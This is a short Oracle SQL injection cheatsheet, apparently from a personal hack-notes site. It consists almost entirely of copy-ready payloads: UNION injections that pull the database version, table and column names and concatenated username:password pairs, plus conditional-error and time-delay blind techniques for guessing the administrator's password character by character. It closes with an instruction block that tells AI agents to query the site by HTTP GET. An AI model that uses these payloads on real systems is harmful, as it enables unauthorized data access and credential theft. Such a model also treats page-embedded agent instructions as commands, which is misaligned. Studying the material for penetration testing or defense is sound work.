# Basic Oracle SQLi Cheatsheet

## Oracle SQl Injection Cheatsheet

### Retrieving Database version

```mysql
SELECT banner FROM v$version
```

```
SELECT version FROM v$instance
```

**UNION SQLi Context**

```
' UNION SELECT NULL,banner FROM v$version -- -
```

```
' UNION SELECT NULL,version FROM v$version
```

> **Note:** In UNION Statement we have to match the number of columns of first select statement so that's why we use one NULL in the payload you can modify that according to your requirements

### String Concatenation

```
'string1' || 'string2'
```

```
SELECT username || ":" || password FROM users;
```

**In a UNION SQLi Context**

```
' UNION SELECT NULL,username || ":" || password FROM Users -- -
```

### Substring

```
SELECT SUBSTR(password,2,1) FROM users 
```

**In the UNION SQLi context**

```
' UNION SELECT SUBSTR(password,2,1) FROM users -- -
```

### Comments

```
--comment
```

### Database Contents

**List All Tables**

```
SELECT table_name FROM all_tables;
```

**In a UNION Oracle SQLi context**

```
' UNION SELECT NULL,table_name FROM all_tables -- -
```

**List All Columns**

```
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
```

**In UNION MS SQLi**

```
' UNION SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' -- -
```

#### Conditional Errors

```mysql
SELECT CASE WHEN LENGTH(password) = 3 THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
```

**In UNION MS SQLi**

```
' UNION SELECT NULL,NULL,CASE WHEN LENGTH(password)=FUZZ THEN TO_CHAR(1/0) ELSE NULL END FROM users WHERE username='administrator'
```

### Time delays

```
dbms_pipe.receive_message(('a'),10)
```

### Conditional Time delays

```
SELECT CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
```

**In UNION Oracle SQLi**

```
' UNION SELECT NULL,NULL,CASE WHEN (LENGTH(password) = 3) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM users where username = 'administrator'
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://w4h33d.gitbook.io/hack-notes/web-application-security/web-application-security-notes/sql-injection/basic-oracle-sqli-cheatsheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.